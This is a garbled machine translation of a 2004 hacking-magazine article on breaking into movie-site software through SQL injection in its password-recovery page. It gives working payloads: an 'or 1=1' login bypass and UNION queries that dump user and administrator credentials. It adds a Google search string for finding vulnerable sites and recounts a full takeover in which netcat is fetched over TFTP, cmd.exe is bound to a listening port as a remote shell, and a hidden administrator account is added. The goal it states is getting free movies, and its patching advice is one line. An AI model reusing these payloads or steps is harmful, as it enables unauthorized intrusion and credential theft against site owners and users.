SQL injection odd incur WINS union query easy free Watch movie

This article was published in the 4th issue of Hacker X Files in 2004

Weekend boring, students want me to help him download some movies to see, I readily agreed. Saw so many period X files, the level naturally to grow quite a lot, also have nothing to play "chicken". I want to download some movies for free this time, no problem (I know n multiple movie programs have holes). Talk less and cut to the chase.

I opened Google, random search of the movie site, a point opened. Look at the interface, and know that the Jinmei movie system is associated with a large. Jinmei system and the "hole" net (7.0 more safe, their own thinking) is similar, there are more than n loopholes, such as injection ah, cookie cheat or something. I read an article in the X-Files 03 11 that wrote the ASC and mid functions to guess the system administrator account. I also want to use this method to guess, guess half a day did not guess right, really annoying, students are still waiting for me where, this is not very embarrassing. I decided to find a simple way, or read the source code it!

Download a Jinmei Three movie system, looked at, so many files, head immediately big. Just run it on your own computer. Registered a user, click to retrieve the password, others said there is a loophole. Look, like a vulnerable interface, there are three parameters, but also directly display the password. OK, look at the source code.

<% If Request ("myUserID") = "" Then%>

...

<%else

Set Rs=server.createobject ("Adodb.recordset")

sql= "Select password from users where userid= '" &request ("myUserID") & "' and City= '" &request ("Ask") & "' and adress= ' "&request (" Answer ") &" ' "

Rs.Open sql,conn,1,1

If Rs.eof and Rs.bof then%>

There's no filtration here. Many people have come up with the idea that they can be injected with the above method. Can there be a simpler way?

I carefully consider the form of the statement as follows:

Select password from users where userid= ' and city= ' and adress= '

If the username, the password question (city), the password prompt answer (adress) matches the table users line, the password is printed and is clear. I think the process will not be written, and then I thought of a method, is to use the union query. Access features are weak, you cannot execute commands, you cannot export text, and you cannot comment. With a subquery available, this Union is the only one left.

How to use it? Do the experiment in this machine first. The test process is brief, write the result of the harvest directly.

If you know a user name for the site (such as ABC), you can use this.

In "Your registration question", fill in: ABC ' or ' 1=1 (if the user name is BCD, it becomes BCD ' or ' 1=1)

Password hint problem place a few letters or numbers, preferably do not have symbols, easy to affect the results: such as the letter A

The answer to the password prompt to fill in a few letters or numbers, fill in a

Return to see the user's password, simple bar (such as figure I).

In fact, the above statement becomes:

Select password from users where userid= ' abc ' or ' 1=1 ' and city= ' a ' and adress= ' a '

Oh, the program unconditionally executed, because by or ' 1=1 ' skip the subsequent validation.

But the site user name is not easy to get AH. Don't worry, it's as simple as getting the username. As follows:

In the "Your registration question" place a few letters or numbers, preferably do not have symbols, easy to affect the results: such as the letter A

The password prompts the question to be like above, casually fills in: I also fills in a

The key is in the password prompt answer: I filled out the a ' union select UserID from users where oklook>=3 or ' 0

The above is to find the gold user's account name (figure II), see the user name and then use the previous method to find the password.

You can add a lot of parameters and assign different values to a lot of accounts after the where.

The input statement after pressing the above entry becomes:

Select password from users where userid= ' a ' and city= ' a ' and adress= ' a ' union select UserID from Users where Oklook> ; =3 or ' 0 '

Careful readers see this may have thought how to get the administrator's account number and password, yes, very simple. I also do not write the process, directly write the statement as follows:

Get account Number:

Select password from users where userid= ' a ' and city= ' a ' and adress= ' a ' union select name from Okwiantgo where id> =1 or ' 0 '

Get Password:

Select password from users where userid= ' a ' and city= ' a ' and adress= ' a ' union select pwd from Okwiantgo where id>= 1 or ' 0 '

And then landing on the line, the path format is:

http://website movie path/findaccout.asp?name= Administrator account &pwd= Admin password

Carriage return, very easy into the management interface. (Figure III)

Sometimes findaccount.asp may be renamed, and then only a gold account can be taken.

This loophole has a lot of movie program has, some program table name is not OKWIANTGO (the program will report 64 line attribute is not correct), change to admin or password., change the above input slightly. So no matter how complex the password, or the Chinese password is no problem. Again, the Administrator account will be more time, where the conditions behind many changes to the line, or you may not get super administrator.

This vulnerability is easy to use and is extremely harmful and easy to get an administrator account. If the system is improperly configured, the upload/uploadmovie.asp allows uploading ASP files, the system is easy to change the host. I have successfully penetrated such a website, the simple process described below.

Upload an ASP program, found that the system runs SQL Server, read the source file to see the sa password, with sqlexec connection, TFTP upload nc.exe. Again dir found that the NC was deleted, there is a strong fire. With TFTP upload nc.jpg definitely foolproof, tftp-i my IP get nc.exe nc.jpg, upload success. Running in SqlExec

Nc.jpg-l-P 99-E c\winnt\system32\cmd.exe

NC must be very familiar with it, above is the target machine to open a 99-port monitoring, while the Cmd.exe redirect to here, the local connection NC.EXE-VV target IP 99, get the shell, but also administrator rights.

Enter NET user ABC 123456/add && net localgroup administrators Abc/add

Add user succeeded by the way to join the admin,&& meaning that the front succeeds after the execution. The system is open 3389, saving me a lot of things.

Okay, back to the point, this vulnerability exists in more than 80% of the film program, Google search user/wantpws.asp, opened and found that you can enter three parameters, and the password directly show that there is this vulnerability.

Patching method, should be rigorous validation of three parameters, and send the results to the mailbox more secure, and some sites are doing so.

Summary: I write this question is to say a lot of questions to think more try, a loophole to use more than one way, we have to learn to discover. The intrusion process is flexible and diverse, and we should use our brains. Free to see the film at the same time do not sabotage ah, any consequences of my concern. At the same time I also hope to see this article, the site changes as soon as possible.